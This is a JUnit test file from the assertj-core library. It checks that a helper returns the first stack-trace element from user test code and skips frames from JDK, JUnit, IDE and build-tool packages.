<reponame>ascopes/assertj-core<filename>src/test/java/org/example/test/Throwables_getFirstStackTraceElementFromTest_Test.java<gh_stars>1000+ /* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * Copyright 2012-2022 the original author or authors. */ package org.example.test; import static org.assertj.core.api.BDDAssertions.then; import static org.assertj.core.util.Arrays.array; import static org.assertj.core.util.Throwables.getFirstStackTraceElementFromTest; import static org.junit.jupiter.params.provider.Arguments.arguments; import java.util.stream.Stream; import org.junit.jupiter.api.Test; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; import org.junit.jupiter.params.provider.MethodSource; class Throwables_getFirstStackTraceElementFromTest_Test { @Test void should_return_first_stack_trace_element_from_test() { // GIVEN StackTraceElement[] stackTraceElements = new Throwable().getStackTrace(); // WHEN StackTraceElement firstStackTraceElementFromTest = getFirstStackTraceElementFromTest(stackTraceElements); // THEN then(firstStackTraceElementFromTest).hasToString("org.example.test.Throwables_getFirstStackTraceElementFromTest_Test.should_return_first_stack_trace_element_from_test(Throwables_getFirstStackTraceElementFromTest_Test.java:32)"); } @ParameterizedTest @MethodSource void should_ignore_test_frameworks_ides_build_tool_and_jdk_stack_traces(String[] fullQualifiedClassNames, String expectedStackTraceElement) { // GIVEN StackTraceElement[] stackTraceElements = buildStackTraceFrom(fullQualifiedClassNames); // WHEN StackTraceElement firstStackTraceElementFromTest = getFirstStackTraceElementFromTest(stackTraceElements); // THEN then(firstStackTraceElementFromTest).hasToString(expectedStackTraceElement); } private StackTraceElement[] buildStackTraceFrom(String[] fullQualifiedClassNames) { StackTraceElement[] stackTraceElements = new StackTraceElement[fullQualifiedClassNames.length]; for (int i = 0; i < fullQualifiedClassNames.length; i++) { stackTraceElements[i] = new StackTraceElement(fullQualifiedClassNames[i], "foo", "Foo.java", i + 1); } return stackTraceElements; } private static Stream<Arguments> should_ignore_test_frameworks_ides_build_tool_and_jdk_stack_traces() { return Stream.of(arguments(array("com.foo.Foo", "sun.reflect", "org.assertj.core.api"), "com.foo.Foo.foo(Foo.java:1)"), arguments(array("sun.reflect", "com.foo.Foo", "org.assertj.core.api"), "com.foo.Foo.foo(Foo.java:2)"), arguments(array("sun.reflect", "org.assertj.core.api", "com.foo.Foo"), "com.foo.Foo.foo(Foo.java:3)"), arguments(array("jdk.internal.reflect", "java.", "javax.", "org.junit.", "org.eclipse.jdt.internal.junit.", "org.eclipse.jdt.internal.junit4.", "org.eclipse.jdt.internal.junit5.", "com.intellij.junit5.", "com.intellij.rt.execution.junit.", "com.intellij.rt.junit.", "org.apache.maven.surefire", "org.pitest.", "org.assertj", "com.foo.Foo"), "com.foo.Foo.foo(Foo.java:14)")); } }
1,846